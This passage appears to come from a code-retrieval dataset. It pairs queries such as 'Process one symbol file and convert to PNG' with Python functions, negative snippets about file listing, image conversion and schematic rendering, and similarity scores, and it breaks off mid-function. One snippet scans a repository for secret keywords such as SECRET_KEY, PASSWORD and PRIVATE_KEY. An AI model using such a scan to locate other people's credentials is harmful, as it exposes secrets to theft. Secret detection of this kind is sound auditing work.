listdir(path=format(getcwd()))\n if search(pattern=r'.exr$', string=nf) and (not search(pattern=r'^L', string=nf))]\n if fileexr:\n for nf in fileexr: \n yield nf\n else:\n print('Exr file not found!')", "def pdbfile_list():\n import glob, os\n os.chdir(\"../Data\")\n file_list = []\n for file in glob.glob(\"*.pdb\"):\n file_list.append(file)\n return file_list", "def find_data_files_distutils(self, package, src_dir):\n from glob import glob\n import os\n from distutils.util import convert_path\n\n globs = (self.package_data.get('', [])\n + self.package_data.get(package, []))\n files = []\n for pattern in globs:\n # Each pattern has to be converted to a platform-specific path\n filelist = glob(os.path.join(src_dir, convert_path(pattern)))\n # Files that match more than one pattern are only added once\n files.extend([fn for fn in filelist if fn not in files\n and (os.path.isfile(fn) or os.path.islink(fn))])\n return files", "def get_filenames_containing(substr, path='.'):\n files = []\n for file_name in os.listdir(path):\n if substr in file_name: files.append(file_name)\n\n return files", "def find_package_data(package):\n walk = [(dirpath.replace(package + os.sep, '', 1), 
filenames)\n for dirpath, dirnames, filenames in os.walk(package)]\n\n filepaths = []\n for base, filenames in walk:\n filepaths.extend([os.path.join(base, filename)\n for filename in filenames])\n return filepaths", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper-tsan.sh',\n 'tools/valgrind/tsan/suppressions.txt',\n 'tools/valgrind/tsan/suppressions_android.txt',\n 'tools/valgrind/tsan/ignores.txt']", "def iter_extension_paths():\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))", "def GetUnknownFiles(self):\n args = []\n status = RunShell([\"hg\", \"status\", \"--rev\", self.base_rev, \"-u\", \".\"],\n silent_ok=True)\n unknown_files = []\n for line in status.splitlines():\n st, fn = line.split(\" \", 1)\n if st == \"?\":\n unknown_files.append(fn)\n return unknown_files", "def test_script_exists(self):\n get_files=os.listdir(\"../../taxonomy/src_files\")\n self.assertIn(\"rdp_lineage_to_tax.py\", get_files)", "def get_paths(pattern):\n if not in_source_tree:\n pattern = '../' + pattern\n\n files = glob.glob(os.path.normpath(os.path.join(top_dir, pattern)))\n return files", "def get_all_bonn_budget_files(fPath, pattern='PlandatenErgebnisplan', end='csv'):\n rlt = []\n for f in os.listdir(fPath):\n if f.startswith(pattern) and f.endswith(end):\n rlt.append(os.path.abspath(os.path.join(fPath, f)))\n return rlt", "def filter_files(path, string):\n try:\n listing = os.listdir(path)\n return [f for f in listing if string in f]\n except:\n raise ValueError(\"Error in upy.contrib.tree.menu @ filter_files()\")", "def GetUnknownFiles(self):\r\n args = []\r\n status = RunShell([\"hg\", \"status\", \"--rev\", self.base_rev, \"-u\", \".\"],\r\n silent_ok=True)\r\n unknown_files = []\r\n for line in status.splitlines():\r\n st, fn = line.split(\" \", 1)\r\n if st == \"?\":\r\n unknown_files.append(fn)\r\n return unknown_files", "def getOMFSrcModuleFiles(self) -> List[ghidra.app.util.bin.format.pe.debug.OMFSrcModuleFile]:\n ...", "def determine_modbase_models_from_modbase_directory( query , out_directory = 'modbase_models' , root_filename = '' ):\n # defaults for written files\n if not root_filename:\n root_filename = 'modbase_' + query\n if not out_directory:\n out_directory = './' # here!\n \n # ta da!\n return [i for i in os.listdir( out_directory ) if root_filename + '_model_' in i and i[-4:] == '.pdb']", "def scanForAssays(self):\n if not self.isDataDir():\n self.setDataDir(os.getcwdu())\n files = os.listdir(self.__datadir)\n print(files)\n for f in files:\n if f.endswith('.tif'):\n print('An TIFF image here! 
(%s)') % f", "def find_files(directory, patterns):\n for root, dirs, files in os.walk(directory):\n for basename in files:\n if \".pyc\" not in basename and \"__pycache__\" not in basename:\n for pattern in patterns:\n if fnmatch.fnmatch(basename, pattern):\n filename = os.path.join(root, basename)\n yield filename", "def _search(self, btn):\n del btn\n if self.txt_search.value:\n found_files: Optional[List[Path]] = None\n while found_files is None:\n try:\n found_files = list(self.current_folder.rglob(self.txt_search.value))\n except FileNotFoundError:\n pass\n self.select_search.options = [\n str(file) for file in found_files if file.exists()\n ]", "def find_file(pattern, base='.'):\n\n regex = re.compile(pattern)\n matches = []\n\n for root, dirs, files in os.walk(base):\n for f in files:\n if regex.match(f):\n matches.append(path.join(base, f))\n return matches", "def boto_service_definition_files():\n\n botocore_data_dir = resource_filename(Requirement.parse(\"botocore\"), \"botocore/data\")\n files = [os.path.join(dirname, file_in_dir)\n for dirname, _, files_in_dir in os.walk(botocore_data_dir)\n for file_in_dir in files_in_dir\n if fnmatch.fnmatch(file_in_dir, 'service-*.json')]\n return files", "def files(self):\n return [surrogate(name) for name in self.hdr[rpm.RPMTAG_FILENAMES]]", "def _jupyter_nbextension_paths():\n return [{\n \"section\": \"tree\",\n \"dest\": \"nbsysinfo\",\n \"src\": \"static\",\n \"require\": \"nbsysinfo/main\"\n }]", "def test_find_with_glob(self):\r\n self.mkbundle('file?', output=\"out\").build()\r\n assert self.get(\"media/out\") == \"foo\\nbar\"", "def get_custom_short_paths(content):", "def find_cache_files():\n files = []\n\n for root, dirnames, filenames in os.walk(\".\"):\n for filename in fnmatch.filter(filenames, \"*.pyc\"):\n files.append(os.path.join(root, filename))\n\n for root, dirnames, filenames in os.walk(\".\"):\n for filename in fnmatch.filter(filenames, \"__pycache__\"):\n files.append(os.path.join(root, filename))\n\n return files", "def test_wildcard_end_regex_generation(self, mock_re_compile):\n self.finder.component_base_directories = ()\n for _ in self.finder.list(['wildcard.end*']): # generators gonna generate\n pass\n mock_re_compile.assert_called_with('^wildcard\\\\.end')", "def test_wildcard_start_regex_generation(self, mock_re_compile):\n self.finder.component_base_directories = ()\n for _ in self.finder.list(['*wildcard.start']): # generators gonna generate\n pass\n mock_re_compile.assert_called_with('wildcard\\\\.start$')", "def find(self):\n extension_hooks = list()\n #Find all extension names\n dirs = pylabs.q.system.fs.listDirsInDir(self.rootDir, True,findDirectorySymlinks=True)\n # Use a simple PMExtensionFactory\n factory = PMExtensionFactory()\n for dir in (d for d in dirs if pylabs.q.system.fs.exists(os.path.join(d, self.extensionConfigName))):\n #we found possible extension because extension.cfg file found\n pylabs.q.logger.log('Found extension in %s' % dir, 6)\n # Load extension ini file\n configfilePath = os.path.join(dir, self.extensionConfigName)\n inifile = pylabs.inifile.IniFile(configfilePath)\n path = pylabs.q.system.fs.getDirName(configfilePath)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def find_firmware_file(dir='.'):\n for file in os.listdir(dir):\n if file[-4:] in ('.hex', '.bin'):\n return file", "def find_object_files(kem_dir):\n for dirpath, _, filenames in os.walk(kem_dir):\n for fn in filenames:\n if fn.endswith('.o'):\n 
yield os.path.join(dirpath, fn)", "def find_sensitive_strings(repo_path):\n print(\"Searching for sensitive strings...\")\n sensitive_strings = []\n for root, _, files in os.walk(repo_path):\n for filename in files:\n if filename.endswith('.py'):\n file_path = os.path.join(root, filename)\n with open(file_path, 'r', encoding='utf-8') as file:\n content = file.read()\n # Look for commonly sensitive strings in Flask applications\n common_sensitive_strings = [\n \"SECRET_KEY\",\n \"PASSWORD\",\n \"API_KEY\",\n \"AUTH_TOKEN\",\n \"DATABASE_URI\",\n \"CREDENTIALS\",\n \"ACCESS_KEY\",\n \"SECRET\",\n \"TOKEN\",\n \"PRIVATE_KEY\",\n \"DB_PASSWORD\",\n \"JWT_SECRET\",\n ]\n for string in common_sensitive_strings:\n if string in content:\n sensitive_strings.append(f\"Found '{string}' in file: {file_path}\")\n\n return sensitive_strings", "def file_check(pattern, file_to_check):\n if file_to_check.name.__contains__(pattern):\n yield True", "def relatedFiles(fname):\n\n # We want to return all files in the same\n # directory which have the following name:\n\n #\n # [prefix].*.[type].gii\n #\n # where\n # - prefix is the file prefix, and which\n # may include periods.\n #\n # - we don't care about the middle\n #\n # - type is func, shape, label, or time\n\n # We determine the unique prefix of the\n # given file, and back-up to the most\n # recent period. Then search for other\n # files which have that same (non-unique)\n # prefix.\n prefix = fslpath.uniquePrefix(fname)\n lastdot = prefix.rfind('.')\n prefix = prefix[:lastdot]\n\n if lastdot == -1:\n return []\n\n funcs = list(glob.glob('{}*.func.gii' .format(prefix)))\n shapes = list(glob.glob('{}*.shape.gii'.format(prefix)))\n labels = list(glob.glob('{}*.label.gii'.format(prefix)))\n times = list(glob.glob('{}*.time.gii' .format(prefix)))\n\n return funcs + shapes + labels + times", "def find_files(base_path,pattern):\n res=()\n print_verbose(2,\"\\t> Recursive search: Base path = %s, pattern = %s\" %(base_path,pattern))\n for root, dirs, files in os.walk(base_path, topdown=True):\n for f_name in fnmatch.filter(files, pattern):\n res= res + (os.path.join(root, f_name),)\n return res;", "def list_runs_in_swestore(path, pattern=RUN_RE, no_ext=False):\n try:\n status = check_call(['icd', path])\n proc = Popen(['ils'], stdout=PIPE)\n contents = [c.strip() for c in proc.stdout.readlines()]\n runs = [r for r in contents if re.match(pattern, r)]\n if no_ext:\n runs = [r.split('.')[0] for r in runs]\n return runs\n except CalledProcessError:\n return []", "def tdfiles(self):\r\n _tdfiles = []\r\n if self.dir_exists:\r\n files = os.listdir(self.csvdir)\r\n _tdfiles = fnmatch.filter(files, self.search_pattern)\r\n return _tdfiles", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def get_files(start_str = \"sim_\"):\n n = len(start_str)\n file_list = [f for f in os.listdir(in_path) if f[0:n] == start_str]\n return file_list", "def findfiles(path, ext=\".pyc\"):\n results = []\n regex = re.compile(re.escape(ext)+\"$\", re.I)\n\n tree = os.walk(path)\n for d in tree:\n # Each element of a walker represents a directory and its contents.\n # Diagnostic, if you wish.\n #print(d)\n if d[2]:\n # Are there files in this directory?\n for f in d[2]:\n if regex.findall(f):\n relpath = os.path.join(d[0], f)\n results.append(os.path.realpath(relpath))\n\n return results", "def search(self):\n files = 
os.listdir(self.filePath)\n txt_file = []\n for f in files:\n f_ext = f.split('.')[-1]\n if f_ext == self.flag:\n if self.flag == 'txt':\n txt_file.append(FileTxt(os.sep.join([self.filePath, f])))\n\n if self.flag == 'csv':\n txt_file.append(FileCsv(os.sep.join([self.filePath, f])))\n\n return txt_file", "def locate(pattern, root=os.curdir):\n for path, dirs, files in os.walk(os.path.abspath(root)):\n for filename in fnmatch.filter(files, pattern):\n yield os.path.join(path, filename)", "def pyfiles():\n for dir, _, files in os.walk('.'):\n for f in files:\n if f.endswith('.py'):\n name = path.join(dir, f)\n if name.startswith('./'):\n yield name[2:]\n else:\n yield name", "def get_file_list(start):\n valid_files = []\n for root, dirs, files in os.walk(start):\n for name in files:\n if name[-5:] == \".conf\":\n valid_files.append(os.path.join(root,name))\n return valid_files", "def grep_me(pattern, fname):\n for line in stream_reader(fname):\n if re.search(pattern, line, re.I):\n print('{}:{}:{}'.format(filename(), filelineno(), line), end='')", "def files(self):\r\n files = []\r\n for path in self.paths:\r\n if os.path.isdir(path):\r\n files.extend(glob.glob(os.path.join(path, f'*{self.ext}')))\r\n else:\r\n files.extend(glob.glob(path))\r\n return list(set(self.get_pattern(fname) for fname in files))", "def find_eggs(path):\n eggs, errors = pkg_resources.working_set.find_plugins(\n pkg_resources.Environment([path])\n )\n return eggs" ]
[ "0.6017925", "0.56027436", "0.5597905", "0.555413", "0.5544122", "0.54559", "0.5441576", "0.5366995", "0.53383917", "0.5280805", "0.5255213", "0.5246665", "0.5238796", "0.52089924", "0.5191325", "0.5161962", "0.51558715", "0.5154216", "0.51451254", "0.513593", "0.5125903", "0.5061598", "0.50500447", "0.5048599", "0.50470847", "0.50244004", "0.5017165", "0.49997702", "0.499968", "0.4995953", "0.49872935", "0.49828067", "0.4982", "0.49807334", "0.4977224", "0.49719188", "0.49707374", "0.49640462", "0.49505746", "0.49469644", "0.49463704", "0.49359244", "0.4934676", "0.4924862", "0.49245393", "0.49223945", "0.49220398", "0.49163103", "0.49163043", "0.4916014", "0.49132055", "0.4899421", "0.48879084", "0.4884161", "0.48833948", "0.48819375", "0.4879848", "0.4876707", "0.4872222", "0.4871832", "0.48700315", "0.4869861", "0.48639652", "0.48589683", "0.48546892", "0.48518634", "0.48505497", "0.48444128", "0.48375624", "0.48294526", "0.48256811", "0.48213363", "0.48171532", "0.48163438", "0.48116782", "0.4808684", "0.47978804", "0.47967345", "0.47947207", "0.4793557", "0.4788044", "0.47863412", "0.478548", "0.47805303", "0.47761422", "0.4774479", "0.47696504", "0.47684008", "0.4767644", "0.47665262", "0.47649124", "0.47563216", "0.47489488", "0.47482082", "0.4746539", "0.47439563", "0.47427532", "0.47421533", "0.47413942", "0.47379118" ]
0.60150164
1
Process one symbol file and convert to PNG.
def process_symbol(filename, mod, mod_cfg, mirror_root, prod_root):
    # Locate the module version inside the mirror of the production filesystem.
    working_path = os.path.join(mirror_root, prod_root[1:])
    log.debug("Finding version from %s", working_path)
    mod_version = utils.get_module_version(working_path, mod_cfg.area, mod, mod_cfg.version)
    log.info("Found version %s", mod_version)
    coords = coordinates.create(prod_root, mod_cfg.area, mod, mod_version)
    mirror_path = os.path.join(mirror_root, coordinates.as_path(coords)[1:])
    # Source .edl symbol file and the directory the converted .png should land in.
    full_path = os.path.join(mirror_path, mod_cfg.edl_dir, filename[:-3] + 'edl')
    destination = os.path.dirname(os.path.join(mirror_path, mod_cfg.opi_dir, filename))
    log.info('Destination directory is {}'.format(destination))
    if os.path.exists(destination):
        # If a matching .png already exists, reuse it rather than reconverting.
        for f in os.listdir(destination):
            n = os.path.split(filename)[1]
            n = '.'.join(n.split('.')[:-1])
            if f.startswith(n) and f.endswith('png'):
                log.info('Symbol png already exists: %s', f)
                return f
    else:
        log.warn('Failed to process symbol: %s does not exist', destination)
        return
    if os.path.exists(full_path):
        return files.convert_symbol(full_path, [destination])
    else:
        log.warn('Symbol %s does not exist', full_path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decode():\r\n # Open the file with binary instructions\r\n with open(file_name) as file:\r\n lines = file.readlines()\r\n with open(PATH + file_name, \"w\") as file_write:\r\n for line in lines:\r\n file_write.write(line + \"\\n\")\r\n\r\n # Read the instructions\r\n instructions, instruction_names = [], []\r\n parse_instr_bin_list(lines, instructions, instruction_names)\r\n\r\n # Print formatted binary instructions and their names\r\n instr_print(instructions, instruction_names)\r\n\r\n # Write to each of MPS-Files parsed hex-instructions\r\n write_mps(instructions)\r\n\r\n # Write to Mapping-PROM linked addresses\r\n write_mapping_prom(instruction_names)", "def main():\n folder = \"D:\\\\Noam10\\\\Documents\\\\Documents\\\\dither 2\"\n filename = \"kirigiri\"\n filetype = \".jpg\"\n input_file = folder + \"\\\\\" + filename + filetype\n for palette in paletteDict.keys():\n output_file = folder + \"\\\\\" + filename + \"(\" + palette + \").bmp\"\n Dither(input_file, output=output_file, palette=paletteDict[palette])\n print(output_file)", "def encode_png(track_metadata):\n\tprint(\"---- Encoding\", track_metadata.file_name, \"to PNG...\")\n\n\t# First step: OptiPNG.\n\tnew_file_name = track_metadata.file_name + \".png\"\n\toptipng_command = [\"optipng\", \"-o7\", \"-strip\", \"all\", \"-snip\", \"-out\", new_file_name, track_metadata.file_name]\n\tprint(optipng_command)\n\tprocess = subprocess.Popen(optipng_command, stdout=subprocess.PIPE)\n\t(cout, cerr) = process.communicate()\n\texit_code = process.wait()\n\tif exit_code != 0: #0 is success.\n\t\traise Exception(\"OptiPNG failed with exit code {exit_code}. CERR: {cerr}\".format(exit_code=exit_code, cerr=cerr))\n\n\tect_command = [\"/home/ruben/encoding/Efficient-Compression-Tool/build/ect\", \"-9\", \"-strip\", \"--allfilters-b\", \"--mt-deflate\", new_file_name]\n\tprint(ect_command)\n\tprocess = subprocess.Popen(ect_command, stdout=subprocess.PIPE)\n\t(cout, cerr) = process.communicate()\n\texit_code = process.wait()\n\tif exit_code != 0: #0 is success.\n\t\traise Exception(\"ECT failed with exit code {exit_code}. CERR: {cerr}\".format(exit_code=exit_code, cerr=cerr))\n\n\t#Delete old file.\n\tif os.path.exists(track_metadata.file_name):\n\t\tos.remove(track_metadata.file_name)\n\n\ttrack_metadata.file_name = new_file_name\n\ttrack_metadata.codec = \"png\"", "def main():\n usage = \"usage: %prog [options] input: BioC File (args[0]); Output Directory for the (picture) .svg file.\"\n parser = OptionParser(version='%prog 0.99', usage=usage)\n\n parser.add_option('-l', '--logfile', dest='logfilename',\n help='write log to FILE', metavar='FILE')\n parser.add_option('-q', '--quiet',\n action='store_true', dest='quiet', default=False,\n help='do not print status messages to stderr')\n parser.add_option('-d', '--debug',\n action='store_true', dest='debug', default=False,\n help='print debug information')\n\n\n\n (options, args) = parser.parse_args()\n\n if options.debug: print >> sys.stderr, '# Starting processing'\n\n process(options=options,args=args)\n\n\n\n\n sys.exit(0) # Everything went ok!", "def convert(filename,\nRenderer: \"\"\"By default, the schematic is converted to an SVG file,\n written to the standard output. 
It may also be rendered using TK.\"\"\",\n):\n \n with open(filename, \"rb\") as file:\n objects = read(file)\n stat = os.stat(file.fileno())\n \n sheet = objects[1]\n assert sheet[\"RECORD\"] == Record.SHEET\n (sheetstyle, size) = {SheetStyle.A4: (\"A4\", (1150, 760)), SheetStyle.A3: (\"A3\", (1550, 1150)), SheetStyle.A: (\"A\", (950, 760))}[sheet.get(\"SHEETSTYLE\", SheetStyle.A4)]\n if \"USECUSTOMSHEET\" in sheet:\n size = tuple(int(sheet[\"CUSTOM\" + \"XY\"[x]]) for x in range(2))\n \n # Units are 1/100\" or 10 mils\n renderer = Renderer(size, \"in\", 1/100,\n margin=0.3, line=1, down=-1, textbottom=True)\n \n for n in range(int(sheet[\"FONTIDCOUNT\"])):\n n = format(1 + n)\n fontsize = int(sheet[\"SIZE\" + n]) * 0.875\n family = sheet[\"FONTNAME\" + n].decode(\"ascii\")\n kw = dict()\n italic = sheet.get(\"ITALIC\" + n)\n if italic:\n kw.update(italic=True)\n bold = sheet.get(\"BOLD\" + n)\n if bold:\n kw.update(bold=True)\n renderer.addfont(\"font\" + n, fontsize, family, **kw)\n renderer.setdefaultfont(\"font\" + sheet[\"SYSTEMFONT\"].decode(\"ascii\"))\n renderer.start()\n \n arrowhead = dict(base=5, shoulder=7, radius=3)\n arrowtail = dict(base=7, shoulder=0, radius=2.5)\n diamond = dict(base=10, shoulder=5, radius=2.5)\n \n pinmarkers = {\n PinElectrical.INPUT: arrowhead,\n PinElectrical.IO: diamond,\n PinElectrical.OUTPUT: arrowtail,\n PinElectrical.PASSIVE: None,\n PinElectrical.POWER: None,\n }\n \n def gnd(renderer):\n renderer.hline(10)\n renderer.vline(-7, +7, offset=(10, 0), width=1.5)\n renderer.vline(-4, +4, offset=(13, 0), width=1.5)\n renderer.vline(-1, +1, offset=(16, 0), width=1.5)\n def rail(renderer):\n renderer.hline(10)\n renderer.vline(-7, +7, offset=(10, 0), width=1.5)\n def arrowconn(renderer):\n renderer.hline(10, endarrow=arrowhead)\n def dchevron(renderer):\n renderer.hline(5)\n renderer.polyline(((8, +4), (5, 0), (8, -4)))\n renderer.polyline(((11, +4), (8, 0), (11, -4)))\n connmarkers = {\n PowerObjectStyle.ARROW: (arrowconn, 12),\n PowerObjectStyle.BAR: (rail, 12),\n PowerObjectStyle.GND: (gnd, 20),\n }\n \n def nc(renderer):\n renderer.line((+3, +3), (-3, -3), width=0.6)\n renderer.line((-3, +3), (+3, -3), width=0.6)\n renderer.addobjects((gnd, rail, arrowconn, dchevron, nc))\n \n with renderer.view(offset=(0, size[1])) as base:\n base.rectangle((size[0], -size[1]), width=0.6)\n base.rectangle((20, -20), (size[0] - 20, 20 - size[1]), width=0.6)\n for axis in range(2):\n for side in range(2):\n for n in range(4):\n translate = [None] * 2\n translate[axis] = size[axis] / 4 * (n + 0.5)\n translate[axis ^ 1] = 10\n if side:\n translate[axis ^ 1] += size[axis ^ 1] - 20\n translate[1] *= -1\n with base.view(offset=translate) as ref:\n label = chr(ord(\"1A\"[axis]) + n)\n ref.text(label, horiz=ref.CENTRE, vert=ref.CENTRE)\n if n + 1 < 4:\n x = size[axis] / 4 / 2\n if axis:\n ref.hline(-10, +10, offset=(0, -x),\n width=0.6)\n else:\n ref.vline(-10, +10, offset=(x, 0), width=0.6)\n \n if \"TITLEBLOCKON\" in sheet:\n if not os.path.isabs(filename):\n cwd = os.getcwd()\n pwd = os.getenv(\"PWD\")\n if os.path.samefile(pwd, cwd):\n cwd = pwd\n filename = os.path.join(pwd, filename)\n with base.view(offset=(size[0] - 20, 20 - size[1])) as block:\n points = ((-350, 0), (-350, 80), (-0, 80))\n block.polyline(points, width=0.6)\n block.hline(-350, 0, offset=(0, 50), width=0.6)\n block.vline(-30, offset=(-300, 50), width=0.6)\n block.vline(-30, offset=(-100, 50), width=0.6)\n block.hline(-350, 0, offset=(0, 20), width=0.6)\n block.hline(-350, 0, offset=(0, 10), 
width=0.6)\n block.vline(20, 0, offset=(-150, 0), width=0.6)\n \n block.text(\"Title\", (-345, 70))\n block.text(\"Size\", (-345, 40))\n block.text(sheetstyle, (-340, 30), vert=block.CENTRE)\n block.text(\"Number\", (-295, 40))\n block.text(\"Revision\", (-95, 40))\n block.text(\"Date\", (-345, 10))\n d = format(date.fromtimestamp(stat.st_mtime), \"%x\")\n block.text(d, (-300, 10))\n block.text(\"File\", (-345, 0))\n block.text(filename, (-300, 0))\n block.text(\"Sheet\", (-145, 10))\n block.text(\"of\", (-117, 10))\n block.text(\"Drawn By:\", (-145, 0))\n \n for obj in objects:\n if (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\"} and\n obj[\"RECORD\"] == Record.JUNCTION and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n location = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n col = colour(obj[\"COLOR\"])\n renderer.circle(2, location, fill=col)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"IOTYPE\", \"ALIGNMENT\"} == {\"RECORD\", \"OWNERPARTID\", \"STYLE\", \"WIDTH\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\", \"AREACOLOR\", \"TEXTCOLOR\", \"NAME\", \"UNIQUEID\"} and\n obj[\"RECORD\"] == Record.PORT and obj[\"OWNERPARTID\"] == b\"-1\"):\n width = int(obj[\"WIDTH\"])\n if \"IOTYPE\" in obj:\n points = ((0, 0), (5, -5), (width - 5, -5),\n (width, 0), (width - 5, +5), (5, +5))\n else:\n points = ((0, -5), (width - 5, -5),\n (width, 0), (width - 5, +5), (0, +5))\n if (obj.get(\"ALIGNMENT\") == b\"2\") ^ (obj[\"STYLE\"] != b\"7\"):\n labelpoint = (10, 0)\n horiz = renderer.LEFT\n else:\n labelpoint = (width - 10, 0)\n horiz = renderer.RIGHT\n if obj[\"STYLE\"] == b\"7\":\n shapekw = dict(rotate=+90, offset=(0, +width))\n else:\n shapekw = dict()\n offset = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n with renderer.view(offset=offset) as view:\n view.polygon(points,\n width=0.6,\n outline=colour(obj[\"COLOR\"]),\n fill=colour(obj[\"AREACOLOR\"]),\n **shapekw)\n \n with contextlib.ExitStack() as context:\n if obj[\"STYLE\"] == b\"7\":\n view = context.enter_context(view.view(rotate=+1))\n view.text(\n overline(obj[\"NAME\"]),\n colour=colour(obj[\"TEXTCOLOR\"]),\n offset=labelpoint,\n vert=view.CENTRE, horiz=horiz,\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\"} >= {\"RECORD\", \"OWNERPARTID\", \"LINEWIDTH\", \"COLOR\", \"LOCATIONCOUNT\", \"X1\", \"Y1\", \"X2\", \"Y2\"} and\n obj[\"RECORD\"] == Record.WIRE and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"LINEWIDTH\"] == b\"1\"):\n points = list()\n for location in range(int(obj[\"LOCATIONCOUNT\"])):\n location = format(1 + location)\n points.append(tuple(int(obj[x + location]) for x in \"XY\"))\n renderer.polyline(points, colour=colour(obj[\"COLOR\"]))\n elif (obj.keys() == {\"RECORD\", \"OWNERINDEX\"} and\n obj[\"RECORD\"] in {b\"46\", b\"48\", b\"44\"} or\n obj.keys() - {\"USECOMPONENTLIBRARY\", \"DESCRIPTION\", \"DATAFILECOUNT\", \"MODELDATAFILEENTITY0\", \"MODELDATAFILEKIND0\", \"DATALINKSLOCKED\", \"DATABASEDATALINKSLOCKED\", \"ISCURRENT\", \"INDEXINSHEET\", \"INTEGRATEDMODEL\", \"DATABASEMODEL\"} == {\"RECORD\", \"OWNERINDEX\", \"MODELNAME\", \"MODELTYPE\"} and\n obj[\"RECORD\"] == b\"45\" and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj.get(\"USECOMPONENTLIBRARY\", b\"T\") == b\"T\" and obj[\"MODELTYPE\"] in {b\"PCBLIB\", b\"SI\", b\"SIM\", b\"PCB3DLib\"} and obj.get(\"DATAFILECOUNT\", b\"1\") == b\"1\" and obj.get(\"ISCURRENT\", b\"T\") == b\"T\" and obj.get(\"INTEGRATEDMODEL\", b\"T\") == b\"T\" and obj.get(\"DATABASEMODEL\", 
b\"T\") == b\"T\" and obj.get(\"DATALINKSLOCKED\", b\"T\") == b\"T\" and obj.get(\"DATABASEDATALINKSLOCKED\", b\"T\") == b\"T\" or\n obj.keys() >= {\"RECORD\", \"AREACOLOR\", \"BORDERON\", \"CUSTOMX\", \"CUSTOMY\", \"DISPLAY_UNIT\", \"FONTIDCOUNT\", \"FONTNAME1\", \"HOTSPOTGRIDON\", \"HOTSPOTGRIDSIZE\", \"ISBOC\", \"SHEETNUMBERSPACESIZE\", \"SIZE1\", \"SNAPGRIDON\", \"SNAPGRIDSIZE\", \"SYSTEMFONT\", \"USEMBCS\", \"VISIBLEGRIDON\", \"VISIBLEGRIDSIZE\"} and\n obj[\"RECORD\"] == Record.SHEET and obj[\"AREACOLOR\"] == b\"16317695\" and obj[\"BORDERON\"] == b\"T\" and obj.get(\"CUSTOMMARGINWIDTH\", b\"20\") == b\"20\" and obj.get(\"CUSTOMXZONES\", b\"6\") == b\"6\" and obj.get(\"CUSTOMYZONES\", b\"4\") == b\"4\" and obj[\"DISPLAY_UNIT\"] == b\"4\" and obj[\"FONTNAME1\"] == b\"Times New Roman\" and obj[\"HOTSPOTGRIDON\"] == b\"T\" and obj[\"ISBOC\"] == b\"T\" and obj[\"SHEETNUMBERSPACESIZE\"] == b\"4\" and obj[\"SIZE1\"] == b\"10\" and obj[\"SNAPGRIDON\"] == b\"T\" and obj[\"SYSTEMFONT\"] == b\"1\" and obj.get(\"TITLEBLOCKON\", b\"T\") == b\"T\" and obj[\"USEMBCS\"] == b\"T\" and obj[\"VISIBLEGRIDON\"] == b\"T\" and obj[\"VISIBLEGRIDSIZE\"] == b\"10\" or\n obj.keys() == {\"HEADER\", \"WEIGHT\"} and\n obj[\"HEADER\"] == b\"Protel for Windows - Schematic Capture Binary File Version 5.0\" or\n obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"DESIMP0\", \"DESIMPCOUNT\", \"DESINTF\", \"OWNERINDEX\"} and\n obj[\"RECORD\"] == b\"47\" and obj[\"DESIMPCOUNT\"] == b\"1\" or\n obj.keys() == {\"RECORD\", \"ISNOTACCESIBLE\", \"OWNERPARTID\", \"FILENAME\"} and\n obj[\"RECORD\"] == b\"39\" and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n pass\n \n elif (obj.keys() - {\"ISMIRRORED\", \"ORIENTATION\", \"INDEXINSHEET\", \"COMPONENTDESCRIPTION\", \"SHEETPARTFILENAME\", \"DESIGNITEMID\", \"DISPLAYMODE\", \"NOTUSEDBTABLENAME\", \"LIBRARYPATH\"} == {\"RECORD\", \"OWNERPARTID\", \"UNIQUEID\", \"AREACOLOR\", \"COLOR\", \"CURRENTPARTID\", \"DISPLAYMODECOUNT\", \"LIBREFERENCE\", \"LOCATION.X\", \"LOCATION.Y\", \"PARTCOUNT\", \"PARTIDLOCKED\", \"SOURCELIBRARYNAME\", \"TARGETFILENAME\"} and\n obj[\"RECORD\"] == b\"1\" and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"AREACOLOR\"] == b\"11599871\" and obj[\"COLOR\"] == b\"128\" and obj[\"PARTIDLOCKED\"] == b\"F\" and obj[\"TARGETFILENAME\"] == b\"*\"):\n pass\n \n elif (obj.keys() - {\"TEXT\", \"OWNERINDEX\", \"ISHIDDEN\", \"READONLYSTATE\", \"INDEXINSHEET\", \"UNIQUEID\", \"LOCATION.X\", \"LOCATION.X_FRAC\", \"LOCATION.Y\", \"LOCATION.Y_FRAC\", \"ORIENTATION\", \"ISMIRRORED\"} == {\"RECORD\", \"OWNERPARTID\", \"COLOR\", \"FONTID\", \"NAME\"} and\n obj[\"RECORD\"] == Record.PARAMETER and obj[\"OWNERPARTID\"] == b\"-1\"):\n if obj.get(\"ISHIDDEN\") != b\"T\" and obj.keys() >= {\"TEXT\", \"LOCATION.X\", \"LOCATION.Y\"}:\n orient = obj.get(\"ORIENTATION\")\n kw = {\n None: dict(vert=renderer.BOTTOM, horiz=renderer.LEFT),\n b\"1\": dict(vert=renderer.BOTTOM, horiz=renderer.LEFT),\n b\"2\": dict(vert=renderer.TOP, horiz=renderer.RIGHT),\n }[orient]\n if orient == b\"1\":\n kw.update(angle=+90)\n val = obj[\"TEXT\"]\n if val.startswith(b\"=\"):\n match = val[1:].lower()\n for o in objects:\n if o.get(\"RECORD\") != Record.PARAMETER or o.get(\"OWNERINDEX\") != obj[\"OWNERINDEX\"]:\n continue\n if 